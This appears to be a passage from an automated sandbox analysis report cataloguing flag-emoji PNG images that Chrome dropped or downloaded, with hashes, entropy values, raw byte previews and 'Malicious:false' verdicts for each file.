                                  Preview:.PNG........IHDR.....................PLTEGpL.z}.y}.rw.jq|||.py|||}}}.dl|||.s{.LU...uuu.......%0.jryyy.^f.......$/u...0:vvv.s{.gn...vvv.mu...ttt.OY.s{.go...xxx.hp.t{....lsuuu.px.gn.GQ................................................................................................................................................................................................................................................v...........u}....dq....qy.nw....kt....hq.ov.dn.fo~~~.`j.[f.dlzzz.Vc._i.ai.Vb.Q^uuu.KZ.Xc.[d.LZ.O\.ET.U_.DS.HV.?O.OX.:K.JV.:J.9K.9J.;K.8J.8J.BO.7H.8I.>M.:K.5G.6G.4F.5F.4E.2D.2D.2C.?L.6F.2C.0B.,?./A.CM.6E./@.-?.7E.,>.+=.*<..>.);.(:.'9./>.(:.&8.%7.9C."4.%6.$5.%6."4.&6.!2.0<. 2.'6.!2.$4.'5..1../..0../..-..-.%3..,..-..+..+..)..)..'..(.#0..%..&.#/..&..$..$..%..%..".....!..&......w..........tRNS.....#-2A@PW[_abbbhsz~~~~.........................................................................................................................................7O...DIDATx....j.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):5812
                                  Entropy (8bit):7.859815494296591
                                  Encrypted:false
                                  SSDEEP:96:LCDQF3ztLGoUkHS7ZINpCCt2sZdUFer3m1nFkMQBWWjn5agQsbnt+i+bTc:LL3xLFNyNI/lt2sQFerwFkMQBWAYPsb/
                                  MD5:43F5284399658826F245912227CD92CB
                                  SHA1:15ABA54793F8A80D94F7544DBC51B9E4A4C60A8C
                                  SHA-256:33299CFF5D86D9199281E85342523F9EA54B81EE51CDCBEF29A5703F3D3FD292
                                  SHA-512:9282A3705F16D116B4D9101DA7667B74B39EF4E917DB574B7C9268DDAECB07CB729D332A8EF50586136B3ADA350A8BE98FB4B78507EBCFFE6434F2B9B95EEA48
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.It.Iv.M{.W.._..e..j..l..m..n..o..p..q..s..t..v..w..x..y..{..|..~............................ ..!.."..$..$..$..%..&..$..".....0c..8.dW;.r5.}@rg:VO3m_-IF,..<..A..I.O..U..g..S..Y..awqDmkgb\T@1'@;.#! -/,5%.(CUELNV>/-y.0p.4Vk.m.p.....Y...s.A..R..r.{Z.iOn^.;."='.).!6.&.R.jA!c7.k+.Z+ Q. G/$.=.t6".F..P0..m.}....PT&Yq uU....w.............#ji \N'8G9=?J\^dm=..S.z]...............b.i...................................Nn..p.\hsMY9....\..S..Gk.Jo.Ci.?c.;^.=_.@c.Hk.Cf.Ei.Eh.Ei.Eh.Cf.Fi.Fh.............................................................xyx..................................................................................................................................................t..G{..q. {. ..!..'..$...w..g..X..Nr.Ry.^..c..m..u..y..{..s..j..a.._..f*.....tRNS.}.........................................................................................................................................................,Hf.....Xi 7....fM~...
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4464
                                  Entropy (8bit):7.852674502485913
                                  Encrypted:false
                                  SSDEEP:96:qZ1n0Hu8lFUm0BsnWrAWVAXwBpYTLFfUOrrPdhUPKf:qrn0plFsBsQAWqXepYT2Ox
                                  MD5:6BD530861BE1779C95C510CB6D0A342B
                                  SHA1:B28673F76CA1025E5A0E56BCF8469BD13A2038B3
                                  SHA-256:622BFE18B6C4852E6BAFDCBC3D7E4FE845902AAF46D951AE7773E93E416F7A1A
                                  SHA-512:9BA38F90469410A2125BD59181D01DF67935C116909F48DB085C4A40377976BCCB217A55EB2E1BE9D84C17A00AB9E8ABBEA5784D9665A6A3061C9B7FBDFC70F7
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e9-1f1f4.png
                                  Preview:.PNG........IHDR.....................PLTEGpL...5. .lwS.....t.F.%.lxS.+gt...0.gu...../.(E.hvhv....s....8.gu.&=...du....a....5.p~aq.i. .hv..2s}....e. 2CX.o}.ZiH[q..6du.e...cq....._p.f...p~.":..1.lz...bt..crf.......0.....3..L.:L.&@..6....cq.............................................................................................................................................................................u...y........r....u.}.s~...._v.kyr..[.o.rc.akt.pi..xwx.Ue.Nd.\jcx..We.D]_r..N_.EY.:TXm..4R.2P.2OUh..KZ.AU./M.-K.7MLe...K.+I.'GLay.)G.+G.'E.5J.%CC\{.&C."@.)B.!?..>BVo..<y>N. =7Ux..:. ;..8.!:..7.$:..56Mj..3/Nt..3..6..1..3..1...,Il%Jx.....3$Iv..,"Gt..,!Fr..- Er..+.B[P1P../.Cp.Bn!Ah..(.@m..*..%.<b.=j.:g.8].."q.&.7d.5^.4X.5a{...3_p...1]./P./\..Ze...,X.*J.*V.&A.(T.&R.$P."K. :. E..;../.o......tRNS........%'017<>>HJSSSaaijtuw.......................................................................................................................................................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4860
                                  Entropy (8bit):7.931528305670703
                                  Encrypted:false
                                  SSDEEP:96:ZqorYgq9xVgPSTeqEguM28tRZZAivgxLvnEuIDJ68CkJ/YmfZDM6K1:oobEY2EguORgBboRjJtfxM68
                                  MD5:AC5C244069BAD7F50D366D2E972D60E8
                                  SHA1:C6C53F0A8B2633C1660A02212A23205B2801F490
                                  SHA-256:7F1311DE4FDE2EDD1122FDA33CE0896856D818E21E2D1061A8C66F25CE67CB06
                                  SHA-512:B73F78E248BF52866D451BD8A3E42360B13B72B02F7EBF4886270683F4C06F6B519BAA6D268C919B7B7F9C5506EECAC530A3D62B066902B641963DC90DA7480A
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.q?<_..<<m..O....L.rgg...M{|..i..U...cc."#k.j..M``...Q..T.q66t..Ljj..l..Ode...N.e.....K.kee...N....i..P.kdd...H.l.hU.??{.../)9...............................................&.....%..&.....%..%..$..#..#..0..*.....%.. ..8.. ..&.....?........"../...........E........L.....4.....'........S...........0.C.......j...T...e...Y.*.>......a...G.Z.........M.............d....D..... ........Uz{........}d...uu.no..os.x.gh.hh.re~cd.]^.\\.ST.VV.RS.PP.JK.JJ.FF.CC.FGp@@.9:.<=.89.78.56.66.45.67.45.34.12.01.12./0.44r-..,-.-.../.&*.+,.++.)*.'(.*+.().''.&'.&'.()y$%.%%.%&.#$..!.$%.''p"#."#. ".. .$$w. .. ....!"m. {!"j................... ^.....g.....|...........X.....q........\..~..}........}..S..e..y..}..|.....{..s.....l..[..O..b........W..T..J..E..z..~....XtRNS.....#%076CMQTY]cgfqv~.................................................................. .5....SIDATx...kp\.a...y.{.!.Z...6..c....5.$..(......!$CB..$....CS./.3M...m&...L......3
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):6707
                                  Entropy (8bit):7.89577218621727
                                  Encrypted:false
                                  SSDEEP:96:vIU6VJX7YuUGNWUgOgFSA9gPh+lQH+bfKhEvZmwALyN8WaMLOrr/dQyxsj25dxrF:v4X0TGN25AA9Vmum/Gf+/dQyT9wu7
                                  MD5:E147426B508C2758EAD5EE54A75D78F1
                                  SHA1:6BD9F10DD108789C6E2783483E5BA11758AB6820
                                  SHA-256:34AB712DF88CFF48F6A533BFA5C5BCB0A6D93D9522AA07BE1F1230443840D3A0
                                  SHA-512:40A2F669A65592CC447B16F43E125DF339A7FF81D7F51961F20A5FF808458EF64412A2BD7E34A0E4CE7B8E71836CB078C932CBE8AB8EAF5C1469C3E6DE7E4B96
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f1-1f1f7.png
                                  Preview:.PNG........IHDR.....................PLTEGpLy4B.]k.p}g.).huk.&.r..s.k.(j.'.mzWet....N\.$7.u.j.&k.'.n{......v.$..,ao}i.%.v..kwm.*ds.HWfj.&dr.o.+.v.cp~j.%.jwd.!`q~q.-.v.g.$b............................................................................................................................................................................................................{.....|.......p.....s..y..u..cz.h{|...n|.hx.Yq.^q.as.hu.ds.Xm.Pj.Yl.Qhuz..^l.Jd.Xi.Pf.E`.H_.>[.Rc.A[.=Z.^h.<Y.H^.9W.:W.AY.8U_m}.:V.J\.4R.6S.DX.4Q.0O.7R.=T.2O..L.0M.5O.+J.EUTds..K.7N.*H.,I.%F.0J.)F.$DP]m. A.0H.&C.(C.*D.8K. @A[r.#@.*BFYk..<.!>.-C..;.#>..;CSf..7.'>..9. :..6.+>..7..47Nc."8..4..0..1.%9..2..2..+..-.#6.E\../~"2..-..&..-v./..).. :3P#<Tp.*v.'..&...w.#k.$.3Pe...0M.6R..Ky...+H.)E.%B."?. =..7..2..)..2..(..].....tRNS.....&/5>BQU_cbceeq}~~~~...........................................................................................................................................................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):6044
                                  Entropy (8bit):7.941967109037597
                                  Encrypted:false
                                  SSDEEP:96:oIavQgZEc/ebQOFxUSCMI3M3njHKtaL53/v0ASzmoeW2YOXsGmH6gAgjc:vAEopM3HKtKPfSzmoh2HsGmIgA
                                  MD5:49F70BE2F73D107697C1EDD1CF052A31
                                  SHA1:F04CB0DFEE34FCA4B03CF4BB398D52F69F6390EF
                                  SHA-256:250CC87FE0798CE61BD4DB722C2C29D1A6875ADA2BA7AA9909A24C0BB2AAF6FE
                                  SHA-512:1DEFF2ED3359D60A3249275635D576CF1F0B4FE9B7B9CFF2AB926CA4E4EC7904DCD4CA45745FB7DB107A11368C33FF29CCBB9F3772CB2C5B27D0012EA65AA061
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1fb-1f1ec.png
                                  Preview:.PNG........IHDR.....................PLTEGpL..=dd...>fe...7lk...8..=ga...O...jf...7qe.JJs........9...ee..n...8...x<Qnk.]]...9..6hh.....gs..:aa...<ll..ek..4.ST..&....................................................................................ww.......hh..........\[........#....pk.JJyy..<<po..x.owph.(.DDad..//kii.66.l..&%it.t_Q."".EDZZ.....'*..... r_.....25R^U...QP.3s.......XS`...\X.HWL.......p=......MLGeK...".......i50V4.......b1...B@ESC.....Y2@C..^*...M7.....V'681h.N.G&13=....N$&&|%&}%%{%%z$${...""y8,..8 .C....!!w..v*($..t..s.:...^..qJ....n..X..P..y..k..X..q.)...P..h..D..e.....M..c..l..@..`..^..P..E..\.....f..:..Y..W.._..U..5..O..T..J..D..:..0...GH}RR.55s??..ZY::z..dii...dLH...hZZ.&'h..p...>;`..d.ww23\``..-.....44...n..Z.POABv""p..a.....b*)y........i..........ed...,,p$$v..k...QQ~.....Z......*tRNS...."18@ORcedkz{.~~.......................,.O....!IDATx^...N.0..ap.......*Q............/.8. .V..0.mn.f.m..B.!..B.!..!.J).4M.......6..!L?=..n+.f`.(.T..L..U].w.B.....6.....C..F
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4482
                                  Entropy (8bit):7.881921811841147
                                  Encrypted:false
                                  SSDEEP:96:qvYFUvPDdGEzchVQePVnTTCXRkwN0hHigTmxlCYOcc7:qTkEzAVrYqwOhMxna
                                  MD5:5D13450B3BE29E13B494C862DAF27F6A
                                  SHA1:2F40395DEA0450A11F80A39487DAB80535BC2965
                                  SHA-256:F3962CAC0521763C9AF14F578A72D1CB363A60993E29A4D94C8A6A7DABE8605C
                                  SHA-512:798B58541DA827CCC7E7DD75F4DC12EDCC551E6D37CDA08AF879C94787AFF8810D7AC258756A3BD1F33A8D370BEA072467EBBA4B296D61029BD814E23EF060E3
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL....W........X.....X.....W....j..T|."w/....W..X.......d......W.....X..V.......Y.....]#....P..V....[...................................................................................................................................................................................~...~.......}..}...|...{...}..y...y.....x....x..}..o..v.......u..r..l..z....q....j..o..m..y....t..k..[..|..i....h..r..}..d..f..i...ss...X..d....x..p..g..M.n^.tb....e..c.._..^..\..b..q..?.X[....Y..Y..W..5.K5.J3.H3.IA.\.XX3.I3.I3.H1.FM..[..0.E+.7F..1.G..C-.B0.D+.@%.0*.?..D!.7o|q'.<'.;7.iS|.,.@$.9...".7,.N#.7*.> .5..3..(".6..4).<..0!.5..1.....$.....2#.6..,.,,..*...#.4..(".2..%..%#.3.....$..(%}6.....#..*.{..x.!t/.{ .p)....s!.j*.l..e#.a&....^..Y..S..N.s......tRNS......%68MT]cdgf{~.............................................................................................................................................................IDAT
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4963
                                  Entropy (8bit):7.887288503040064
                                  Encrypted:false
                                  SSDEEP:96:NQcoLPVfk2g+kUSqpwcB5WP59jXctQ1NH8gIaXXVIuVK14N:a8hrUSqGc49jXctQegIwSHyN
                                  MD5:03DE615A8A5A564CD3B9856E8E5A35A7
                                  SHA1:887455BC6C3322F51B4AC6703D497799B4A2C297
                                  SHA-256:410BD2F65506FE08B223222DC2DA1C6555B170EABFA46D0B7B3F2594BE947F4E
                                  SHA-512:E6D7B712A8C822D5C0DE781810E8B4A5A74F9624259D9506D53941AB2BFD98D2974B89DE78C95564081DD4EC4405414B2B17A471E6408F9B023C4D65BAD0B785
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e6-1f1e9.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.^E..m.]Tf.$.oTB.1..l.p..r.S.(.w..hokn..'/..l..?.lr.u.q....J..ltx...l.nsm..NSw.t...A..nsw...l..Bsv.w. .lr..A.v...ko..sv...ls..IMt........,..........................!../..$.....%..4.....%...."..$..$..(../.....#.."..6.....?..$.....;..&..I........;...M.."....(..P..!..3..Y..n..!...(..[.<.e.......Q...5.+......<........&.W....q..".........C......V.....|.......2..{..z.....`.....i..v.....E..t....4..C.c..p........k.y7.....d.m7.i_.ot....`;.hm.vf.\X...._f.T:.OVpt..}..Y`.SZ.CB.v.fk..HQ.5C.:7.>H.3@.1>]c../<.0<.'G.1A.;F.-9Y^..+7.*7.(6.*7.+7.'3.,7RX..&3.'2qZ..$1.,6.$0.$0.!..!.. ,IP..#...*.*3..).$0..(..(..&..&BH...%.&/..%<D.;C.>Cv:B.9A..!*..$8?.6>.5=.4<~..!3;~4;x2:|19{..&/7y...27k(3..5x&2.,4v-4p*2t)0r...(/p)/b&-n$+j!)eo..#)V &`.#V.#I..L..C..>........tRNS.....%178;ITV^cddqsy~...................................................................................................................................................!fu....jIDA
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):6707
                                  Entropy (8bit):7.89577218621727
                                  Encrypted:false
                                  SSDEEP:96:vIU6VJX7YuUGNWUgOgFSA9gPh+lQH+bfKhEvZmwALyN8WaMLOrr/dQyxsj25dxrF:v4X0TGN25AA9Vmum/Gf+/dQyT9wu7
                                  MD5:E147426B508C2758EAD5EE54A75D78F1
                                  SHA1:6BD9F10DD108789C6E2783483E5BA11758AB6820
                                  SHA-256:34AB712DF88CFF48F6A533BFA5C5BCB0A6D93D9522AA07BE1F1230443840D3A0
                                  SHA-512:40A2F669A65592CC447B16F43E125DF339A7FF81D7F51961F20A5FF808458EF64412A2BD7E34A0E4CE7B8E71836CB078C932CBE8AB8EAF5C1469C3E6DE7E4B96
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLy4B.]k.p}g.).huk.&.r..s.k.(j.'.mzWet....N\.$7.u.j.&k.'.n{......v.$..,ao}i.%.v..kwm.*ds.HWfj.&dr.o.+.v.cp~j.%.jwd.!`q~q.-.v.g.$b............................................................................................................................................................................................................{.....|.......p.....s..y..u..cz.h{|...n|.hx.Yq.^q.as.hu.ds.Xm.Pj.Yl.Qhuz..^l.Jd.Xi.Pf.E`.H_.>[.Rc.A[.=Z.^h.<Y.H^.9W.:W.AY.8U_m}.:V.J\.4R.6S.DX.4Q.0O.7R.=T.2O..L.0M.5O.+J.EUTds..K.7N.*H.,I.%F.0J.)F.$DP]m. A.0H.&C.(C.*D.8K. @A[r.#@.*BFYk..<.!>.-C..;.#>..;CSf..7.'>..9. :..6.+>..7..47Nc."8..4..0..1.%9..2..2..+..-.#6.E\../~"2..-..&..-v./..).. :3P#<Tp.*v.'..&...w.#k.$.3Pe...0M.6R..Ky...+H.)E.%B."?. =..7..2..)..2..(..].....tRNS.....&/5>BQU_cbceeq}~~~~...........................................................................................................................................................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4101
                                  Entropy (8bit):7.930549420303185
                                  Encrypted:false
                                  SSDEEP:96:/S0D21e+Vvxh55MAIwBxTdlU/KDeTKGYEYZb1:/Se2zVpb2mBdQNrk1
                                  MD5:CE78B4AA3A6846060FA0400C7AACBE38
                                  SHA1:F1675097AD2EBB4F5E91D044F5839D776F3E2B1E
                                  SHA-256:6533E6964C7033ACF627B78D9EB394669F8CAE0C1700D8187B2AD51C2102E6C2
                                  SHA-512:D895F221C7E64A25F5039D47C84FD5DF8F31B9EC467595963D998592E0210BD3E870B901555FECDA25E5396F786F888CA2873349C49DCE650D3E33AD3AB105B2
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL...i........g.....e........i...........{}..$k...#>...q..c...'F$A]...k.....i.....k........j.....m........l...........d..PUw...........................................................................................................................................................................................................................................gkm...TY[}..UY.DIPs..6<.14.6<.,,.5;.5;.39.4:.28.;E.17.06.28.HZDh../5..4.06.,2.(..+1.)/.*0.!"..3.'-qIi.'-.%+2_..8I."(1\..+0.d..#).!'.$)....Z...%.#(,X...%.(..^..."*V..#(9Qs..!'U.'S.....Z..&+%R.......MBg.. y0H..$$P.....!&"O~...."&!M}.......L{.......L..!$....Q..JzH9].Iy.......Hx....Fv.J~..#&Ce....Eu.Cr.Bq}."....Ey.Ap...36[.@n....?m.>l...t...=k{...At.<j....:ip...9e;(Co...5aw...5k.3[i....SE.$c...+`.'H.">.....*tRNS......%07IH[`ccbeijwx~...........................IDATx....]U....[......T..-...h..x....Q.m..Bo b#A[.D..h.R..@tt29.{_g.^..3.4.$.~..>.......................6.<..*...V..H..vX
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4901
                                  Entropy (8bit):7.9188566935003015
                                  Encrypted:false
                                  SSDEEP:96:jo/3q9yFo1VFfeWAXqKWjxaEbIVP5joOQX82y2Wfj/UpOnBJLCc8HR1j9u:jo/3H6VFfrAXqjsEb6xkZ8Z2XApCcSn8
                                  MD5:1919C02A1F990B1B7A9273512D7B3E3A
                                  SHA1:9E5E1564F9DE63CE8A6A9CB4DA643141B22E43C7
                                  SHA-256:888CED05E3E686FF29A9E167E5FE8075936D855F9A0EDD3965D19C649E701359
                                  SHA-512:D405374AD879BCA3A585225DF294BCB194EA17CE2ACEF357959911C6D6E55F73070B2251F37094AA2D93ECC25604285C971C0ED218F909A218093109993BE2BD
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f9-1f1ff.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.s..g!^^^'RZ#O].....~k.yvg.'NX.Ve.k...Z.ka_V.Mh...t.~-dmw....m.Ztw...VkcaY.Wqv...Ztn.x..$.x.....Pm.Xr.Wq..t...n.xn.{L.Q{h....q.~___.q:.G.Hb....Mgf.p..qyh.&&&.........$$$""".........$........... ..2...>.T..6...(.?.....7......#.9-.D&.=......&../.F2.I#....44.K9.O...$.;..7...*.A......!.8..57.M.r......5...... .....&..$................('&..0.t..k":.R....f!..-.. .Zv>.U......^z........n.z...../......y'..+..1.."F.Z..*Z.k...O.a..#<.S..,....5765..4..1.h...!.. ..6.. %.Y.Kf.m..c.e.rv.......!d.n..C.Sp..8.x...$h.u ......z...$..:.t.C.QAAA.........~..-,.,R.`.........".._.o...SSS......<.Ol.wH.V../W.fR.e...;.M..H.w&..QF..n.....3..!2.DJ.[GGH..T6.@..*$.84-..u-.....=`T!F=.WZY..D..Cr.K....d..)..ENNN........l_(;.@..R..3.....NB..~.&..%M.Z..L(#.D.....>l....0Y....WrG.B...5tRNS.c~..,a8..?S.|.o.d......f..c~..xS..#.........h.x4I......IDATx...}\S.......ee.yofZ.....I.B..T|..|.te..Vz.j...).N..mx.6lP..L1K.$...W(PLR4I3....;.....q..8.Q.....o....k..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):5928
                                  Entropy (8bit):7.85944570722899
                                  Encrypted:false
                                  SSDEEP:96:8mwErSe2rRO8lDpDIM/27wm3+RHAGM6eGL7Qs3cyHstxCVQnEJcjQ+iruk:ereERO8zRiwm3oAGM6p3QsMuQEuNkuk
                                  MD5:B462459C20514CBBA133443828A2AA68
                                  SHA1:800A8FE4F6BEFB824F9D82E2661029AEAD9FE873
                                  SHA-256:48B10FB5CBC784B5C3932BACA0F8309E6F8114FE1E81F636CEF19B85583365B7
                                  SHA-512:4782B8269B498DF85431D3C440CED08719B263681D458653F5DF8E654B4AB00E5C7D46B3403CE15830DE0966147931AB6A0CE571D90B6F6EBC8E68D5F90307B4
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e9-1f1f2.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.S'.S&.W(.b..k2.r2.x5.x:.p8.zAQ..w...E..=..;..E.u6m.)K.&W.'M. V.(T.)U.&U.$Q..R..=.s.......R.g.........$$%..$Vf...&.....$..............................|8.{8.|:.~:..<..=..>..?..@..B..D..E..G..I..K..M..O..Q..S..U..W!.Y#.[%.]&.^.._..]..\.\N..R.?Y.YG..*..\..e..bp.I..... ....}>..3..6..J.b..........i.rl.{a.zb.}o..h.~e.~h..j..b.~].xL.q=.h/.a8.hF.qT.w]....A..Gl..........................................................i.mb.{8a@.L).S..M*.J'.I%.2..H%.N-.I&.G#.E .L%.Q,.W1.d8.]1d.8D.'002GCCVTN_aZ..c..Y |H.nA)tJ;|V=oTxmE.nX.F%a.{.............u..v...............s{.en.M^.DS.6G...;.#N.CErPK.<I..SBhN.3Q.2N.+Q.KL..P..L6O@B]PWn]cxjl.ov..~.................$9$.'........................$..........+..Wj.;E.K#.X(.Y..R..L%.R6.\E.eR.o[.vE.h8.a-.Z!.Q..H..I..E.uA.k<.i<X......tRNS.}..................................................................................................c?.9[o....................................%......eF-.........................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):5505
                                  Entropy (8bit):7.946868742651499
                                  Encrypted:false
                                  SSDEEP:96:Z0IjAc9fcDOxrlGYE5hYT6XPr/Y0Y6yq5LqwCQlzzLwEM/1RGT+5KUgK:Z3995hlGYEXYT6XPr/HTBqwLlbTSKTK
                                  MD5:DFFD5F9E88BD7AFEE47D8DAE4CA49D56
                                  SHA1:1BD9C1FD064F4249F6883373036D2FD642C43264
                                  SHA-256:7BD3ABE5286F53F184977D7BD0A2F83C7E04B94AB053C678A0576C72B19F8315
                                  SHA-512:51018FEA82C29C47692EC32791D42B38A1CDECE3149B7AF653C3DA0775758EE49DE45CA97F19D8663A1EB79A6E94C69841CABD60B1A02DDF6E2DB75D9E7C0E4C
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f1-1f1f0.png
                                  Preview:.PNG........IHDR.....................PLTEGpL..i.j".s~h..h .s|f..x|e.{e..m.i!../.|).vxa..t..o.l"u_..y.r.l$t].zc..w.o&.i!t^..t.{.l#v_...F..O..C..F..D..F..I..\..7..J..I..B..\..H..A..F..4..@..[..C..A..K..+..>..U..d..K..)..9..M..W..'.g.B.I.2.N.m.y.A.P.0.a.P.t.!.-.3.=.F.^.3.a.).H.P.V.=.6.'.Q.L.%..Z.Q.6.@._.-.P.>..,....C.S.A.A..2.A.V.~B.?.;..?..?..2.)..&.~=.|A.|F.}=.s1..S.|;..".z:.p0.zY.y9.=..1.x7./.w8....u5....qY.s5.{3..... .yB.r@....h\.....(.f3.`[.x(.k<.~&.bI.YYo.>.z(.x..UZ._;.t:.O`.u..u&.UM.q8.r..I`.p%.Fbqy&.n..Ea.S<.Fc.E`.C_.Bc.D`.D_.JO.B^.k..Ba.V/.>c.@[]x*.N9.;d.>Y~f..=Y.7b.;V.BGzb..9T.3a.I1.6Q.2\t]..-cEo/.@4.3N.9@./Z.0K./J.2="r@.-H.&Z q>.67.,G.p=.o=.*D.n<.(B.l:.%L.tC.&@.j9.h7.qB..O.#?.$?.g5."=.f4.!;..D. ;..;..:.a7..E..;..G..>.Z5.X3..e.o..j..N....$tRNS.....$/1;?MT_ccgl~..................].k.....IDATx^....0.....0..@`.*...y.H.....n[........[SL9....-.sE.u\...../u..6..`x[...(+.C.....z..:...I.1..........@,.*+...p.!..C..sV
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):9348
                                  Entropy (8bit):7.912142869992333
                                  Encrypted:false
                                  SSDEEP:192:0c9c42Q7qo0ewwyBARm+DuoaVrUB1t7nz1ZH/Ic6wP:07PsqB4o+DeVALtFZIJ4
                                  MD5:B9F90C5ADE4CBF1DC689BE1A013E9B33
                                  SHA1:7A8E93842AA442F867153B64CBCABFA8EC6DBBED
                                  SHA-256:497CB4D7298432CB2B77C65D67DF4C93A4371BB8541556D03E08FE363C290481
                                  SHA-512:13D67CC0BD05A2C226E343B3C2A2B57F9D5F7C656F740B1C46D130CEE9A429ABBF0C9CDA67EF0C797C94F5E6E60D9284F2CF6C40784F4345AB9234DBC11E13BF
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ee-1f1f4.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.1].0^.4g.7r.=v#Az$D.%H.0N....Um._s...............t..,>`P]t;G\.#E."E0;Qhik.6H.,P@B3JLGWXQbgZWvW1[0...BhB.C.q.qym04GlGTl..C.$L.+Y.,d.%`."Y..T..I..B..FQ[l..........+R.ru.......................iiv*6Q.qy...\l.o..z........y..vu~{sy|wzssrjknyyysut|}}........................................................................................................................Uq..........i.....Nk....^x....If.d}.z.........P....5T.@].8X.Ba.#H.'J..C.!E.(L.)M.zCn.9I./@.6F.1A.,=.(9.&7."3.......c.tU......0@.=J.LX.Wb.en.py...#/.....$..*............z...#.......-*.[b..8u..w.....^;.cW%.x,}`..K...0...........................S`zns}..............kw.............GV.Zh..XaX..1L~8R.,I....j|....v...7}.=..?..A..;~.9z.6x.3u.0r.-q.,m.)k.&i.#g..cAY.Jb.Rf.]n.ev.jy.x{............tRNS.b.................................................~.~}.~*.6a......8....._J+<Qq....................................................................................................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):5126
                                  Entropy (8bit):7.839409451100217
                                  Encrypted:false
                                  SSDEEP:96:O2SOIytrzA+IFl42GfnASYleRGGrQjaMYhDIMjxMS9IaqzXR8YpmN9TarMFH7UT:RcytrzWFlW/1r56aMYhD7jxF9I5XZpmu
                                  MD5:520CBB9588DF3F7D2459486F10575CA5
                                  SHA1:654CFFCB76A8158FC6561711C57FF980265FB2F5
                                  SHA-256:08A74A44B2159DE7347665C9A82A5FC1EC0738A080A850DF27B5211F98BB4C0C
                                  SHA-512:06B4076C2D796F687199A1C1FEE2660DFA349B3D00CD6FE89BA80BD3D7CA2509CD603C777C3C821CBAD50D9DB1C3AE1B15BC331FFCE7E17F49ADBCB4AE524017
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e6-1f1f7.png
                                  Preview:.PNG........IHDR.....................PLTEGpLBa{Ca|Ed.Nq.U{.[..`..`..a..b..b..c..d..e..f..g..h..i..j..k..l..m..n..o..p..p..r..r..t..u..v..w..y..y..z..{..|..}..~..................................{..w...................................................c..x..~.....................................................................T..Y..\..`..h..|F.._.R.W.[..g..d.T..P.m.s......................................................................................................................................................v.f.........s..q................m|.Ii.[v.h..p..t..y..|...............................................Oi.KbxF^t=Tj9PfAYo?Vl@Wl>Uk?Wm=Uk@Xn@Wm?Vl9Pf6Mc9Qh=Ul@ZqC]uLm.^..X~.Tq.G_uIbxKe}Li.Pm.]}.c..e..i..j..o..r..x..{..s..n..j..a..Yy.Xw.Vu.Zx.. iQ....tRNS.~.........................................................................................8....c..................................................................................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4340
                                  Entropy (8bit):7.921573882667396
                                  Encrypted:false
